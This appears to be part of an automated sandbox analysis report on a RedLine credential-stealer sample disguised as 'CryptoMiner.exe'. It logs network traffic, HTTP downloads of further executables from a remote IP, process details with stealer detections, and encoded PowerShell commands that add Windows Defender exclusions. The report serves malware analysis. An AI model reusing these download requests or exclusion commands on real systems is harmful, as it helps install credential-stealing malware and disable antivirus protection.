                                                                                                                                      May 5, 2022 03:30:53.533083916 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.533287048 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.533447981 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.533606052 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.691054106 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.730592012 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.730618954 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.730633020 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.730782032 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.730823040 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.730866909 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.730964899 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.731021881 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.731110096 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.731314898 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.731406927 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.770251989 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.770384073 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.770560026 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.770633936 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.770834923 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.770925045 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.770981073 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.771054029 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.771095991 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.771152973 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.771311045 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.771384001 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.809745073 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.809887886 CEST4979632936192.168.2.565.21.213.209
                                                                                                                                      May 5, 2022 03:30:53.809937954 CEST329364979665.21.213.209192.168.2.5
                                                                                                                                      May 5, 2022 03:30:53.810018063 CEST4979632936192.168.2.565.21.213.209

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      May 5, 2022 03:31:13.085592031 CEST5446353192.168.2.58.8.8.8
                                                                                                                                      May 5, 2022 03:31:13.104031086 CEST53544638.8.8.8192.168.2.5

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      May 5, 2022 03:31:13.085592031 CEST192.168.2.58.8.8.80xfd57Standard query (0)ip-api.comA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      May 5, 2022 03:31:13.104031086 CEST8.8.8.8192.168.2.50xfd57No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • 45.9.20.31
                                                                                                                                      • ip-api.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.54980245.9.20.3180C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      May 5, 2022 03:30:55.478178978 CEST12405OUTGET /asdasdasd.exe HTTP/1.1
                                                                                                                                      Host: 45.9.20.31
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      May 5, 2022 03:30:55.537370920 CEST12407INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 05 May 2022 01:30:55 GMT
                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                      Last-Modified: Fri, 29 Apr 2022 17:53:48 GMT
                                                                                                                                      ETag: "381d98-5ddceb97b6ef9"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 3677592
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 5c 38 f4 2f 3d 56 a7 2f 3d 56 a7 2f 3d 56 a7 3b 56 55 a6 21 3d 56 a7 3b 56 53 a6 87 3d 56 a7 3b 56 52 a6 39 3d 56 a7 7d 48 52 a6 3e 3d 56 a7 7d 48 55 a6 3b 3d 56 a7 7d 48 53 a6 65 3d 56 a7 3b 56 57 a6 2a 3d 56 a7 2f 3d 57 a7 72 3d 56 a7 93 48 53 a6 2e 3d 56 a7 93 48 54 a6 2e 3d 56 a7 52 69 63 68 2f 3d 56 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 29 01 00 00 d0 03 00 00 dd 02 00 00 e0 00 02 01 0b 01 b8 1d 00 b2 12 00 00 4a 02 00 00 00 00 00 b1 30 22 00 00 10 00 00 00 d0 12 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 57 02 00 00 06 00 00 00 00 00 00 00 00 e0 37 00 00 04 00 00 ff 02 00 00 03 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 39 60 15 00 50 00 00 00 00 d0 37 00 db 08 00 00 00 00 00 00 00 00 00 00 68 d4 37 00 30 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 49 43 65 62 6f 51 00 35 5e 10 00 00 10 00 00 00 60 10 00 00 04 00 00 84 02 00 00 61 03 00 00 63 03 f7 00 20 00 00 60 7a 63 50 6c 74 00 00 00 75 50 02 00 00 70 10 00 00 52 02 00 00 64 10 00 6d 01 00 00 0b 03 00 00 7d 03 54 02 20 00 00 60 72 72 46 35 74 61 00 00 a0 f3 01 00 00 d0 12 00 00 f4 01 00 00 b6 12 00 df 01 00 00 3f 00 00 00 2e 00 b8 02 40 00 00 40 49 4b 62 67 61 00 00 00 f0 1c 00 00 00 d0 14 00 00 10 00 00 00 aa 14 00 1c 03 00 00 bb 02 00 00 ee 02 5b 01 40 00 00 c0 30 33 41 41 6f 63 00 00 dc 2d 00 00 00 f0 14 00 00 2e 00 00 00 ba 14 00 fc 01 00 00 57 02 00 00 1a 02 32 03 40 00 00 42 36 6d 61 54 71 77 00 00 00 40 00 00 00 20 15 00 00 40 00 00 00 e8 14 00 0a 01 00 00 9b 02 00 00 08 03 b2 01 40 00 00 c0 50 4b 6d 59 74 61 00 00 00 10 00 00 00 60 15 00 00 02 00 00 00 28 15 00 5c 03 00 00 4f 03 00 00 c0 03 3d 03 40 00 00 c0 67 54 78 31 71 77 00 00 00 60 22 00 00 70 15 00 00 60 22 00 00 2a 15 00 3e 01 00 00 75 02 00 00 39 03 e4 03 60 00 00 e0 39 59 52 74 63 00 00 00 db 08 00 00 00 d0 37 00 00 0a 00 00 00 8a 37 00 6b 00 00 00 15 00 00 00 5c 00 d1 02 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$k\8/=V/=V/=V;VU!=V;VS=V;VR9=V}HR>=V}HU;=V}HSe=V;VW*=V/=Wr=VHS.=VHT.=VRich/=VPEL)J0"@W7@9`P7h70IJICeboQ5^`ac `zcPltuPpRdm}T `rrF5ta?.@@IKbga[@03AAoc-.W2@B6maTqw@ @@PKmYta`(\O=@gTx1qw`"p`"*>u9`9YRtc77k\@@UQ
                                                                                                                                      May 5, 2022 03:30:58.812596083 CEST16252OUTGET /rigx.exe HTTP/1.1
                                                                                                                                      Host: 45.9.20.31
                                                                                                                                      May 5, 2022 03:30:58.871620893 CEST16254INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 05 May 2022 01:30:58 GMT
                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                      Last-Modified: Thu, 21 Apr 2022 17:31:37 GMT
                                                                                                                                      ETag: "4a7400-5dd2d7b6f9253"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 4879360
                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 53 94 61 62 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 6c 4a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 4a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 4a 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 6b 4a 00 00 20 00 00 00 6c 4a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f6 05 00 00 00 a0 4a 00 00 06 00 00 00 6e 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 04 fe 49 00 ac 8d 00 00 01 00 00 00 3b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 f3 02 a8 ee 4f 1c c4 eb 33 07 16 13 14 d9 37 48 ba 9a 90 8f 0f 21 25 d8 ac ec b2 67 fc 9c 13 7b f5 4e ed 17 3f ea 18 79 89 c3 bd 87 14 1e 33 93 d9 1f de c2 6e e7 f1 39 f1 5d 27 8a 9f ec 0f 55 5d bb 38 57 38 fe c9 34 3a 11 0b 29 a4 8f ef 2e 39 b4 50 ca 72 64 0e f3 22 6f 7e 6e b5 8d 8f ea 4b e8 15 2a c5 9b 89 1e c7 82 61 6e 86 ab 96 ec 1d fa a7 76 45 e1 0e dc 60 2f 4e 88 ac e5 5e 97 ba c0 48 e5 c7 88 9b 1e 0e e8 1c 6e 65 14 27 f6 be 57 8b 14 5c 54 10 ba c3 86 c9 40 de 5b 06 7f 05 46 a8 32 b5 d0 be 98 63 5d af f6 75 88 b5 49 cf 67 12 4d 0d ab 20 24 c7 3e a7 97 77 d7 49 6c 40 21 20 3d 3b 8e 6a 9e 08 2d 81 80 64 20 aa 5c 34 08 c3 47 40 3d 06 cd 70 3f cd 91 42 37 17 e3 ce 43 94 6b d4 4a 7a 83 0b 1c 32 72 7e b7 60 dd ab 6d b9 f2 9c cc bb db a1 8e 1e 88 49 6e 5d c0 fb 87 64 c1 d8 f1 51 bb a1 5d 00 22 de db e4 66 49 d6 75 eb c9 f5 82 0b 2c 0e 39 cf e1 93 70 5a 8c 8f 42 c1 69 49 6a 9b 0d 92 99 cd 15 a5 02 3b 63 cd 3c 33 a3 65 3e ef 79 94 1c 67 b5 ab fe 1d 54 66 5a a3 4d f8 c5 26 26 40 21 5e 5f c0 f9 d7 6d fb d6 ac a3 46 49 e8 83 33 e3 bd 7b 4e 65 86 cc 8e 32 3a 81 52 64 f8 6f a7 90 c5 f2 9b 9a 14 bd 08 66 33 33 ea a6 7c a9 c0 0a a6 eb ce a6 d9 ed cb 7e 06 85 b4 7f 89 36 32 d8 1f bf 96 10 90 3a b5 6f 6a eb fa 8b 70 e7 28 64 4a 88 e1 67 75 b5 0e e8 0a 55 a8 52 40 d6 78 f3 63 24 e6 b9 63 84 e3 f0 f1 ea 79 ce ff 62 52 26 66 3e 3e 72 2d ac ca ce 9e 43 e0 83 ae 3e 4a e5 00 93 25 8a 61 a3 94 7b 45 c7 8f e7 4e f7 3b 30 c0 cd 24 06 44 86 59 62 01 ad e7 c3 59 d5 d4 88 fc b3 b5 ea 1e ff af e4
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdSab"lJ @ J@@@ J H.textkJ lJ `.rsrcJnJ@@HI;O37H!%g{N?y3n9]'U]8W84:).9Prd"o~nK*anvE`/N^Hne'W\T@[F2c]uIgM $>wIl@! =;j-d \4G@=p?B7CkJz2r~`mIn]dQ]"fIu,9pZBiIj;c<3e>ygTfZM&&@!^_mFI3{Ne2:Rdof33|~62:ojp(dJguUR@xc$cybR&f>>r-C>J%a{EN;0$DYbY


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.2.549832208.95.112.180C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      May 5, 2022 03:31:13.197494030 CEST21575OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                      Host: ip-api.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      May 5, 2022 03:31:13.234152079 CEST21575INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 05 May 2022 01:31:12 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 5
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      X-Ttl: 60
                                                                                                                                      X-Rl: 44
                                                                                                                                      Data Raw: 74 72 75 65 0a
                                                                                                                                      Data Ascii: true


                                                                                                                                      Statistics

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:03:29:17
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Users\user\Desktop\CryptoMiner.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\CryptoMiner.exe"
                                                                                                                                      Imagebase:0xd70000
                                                                                                                                      File size:1579064 bytes
                                                                                                                                      MD5 hash:310EB5BD45AC9C5767D28E63AB64635B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.548433577.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:03:30:15
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                      Imagebase:0x840000
                                                                                                                                      File size:41064 bytes
                                                                                                                                      MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000000.542266865.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.648033641.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:03:30:57
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\fname.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\fname.exe"
                                                                                                                                      Imagebase:0xcb0000
                                                                                                                                      File size:3677592 bytes
                                                                                                                                      MD5 hash:C61F9A9059F8B8BD0E69F7DF4CB09786
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 31%, Metadefender, Browse
                                                                                                                                      • Detection: 69%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:03:30:58
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff77f440000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:22
                                                                                                                                      Start time:03:31:00
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                      Imagebase:0x210000
                                                                                                                                      File size:98912 bytes
                                                                                                                                      MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:03:31:00
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\filename.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\filename.exe"
                                                                                                                                      Imagebase:0x850000
                                                                                                                                      File size:4879360 bytes
                                                                                                                                      MD5 hash:C108EBDD14A2CF40E64411792987796A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 29%, Metadefender, Browse
                                                                                                                                      • Detection: 81%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:03:31:16
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                                                                                                      Imagebase:0x7ff602050000
                                                                                                                                      File size:273920 bytes
                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:03:31:17
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff77f440000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:03:31:18
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                                                                                                      Imagebase:0x7ff619710000
                                                                                                                                      File size:447488 bytes
                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:high

                                                                                                                                      Disassembly

                                                                                                                                      No disassembly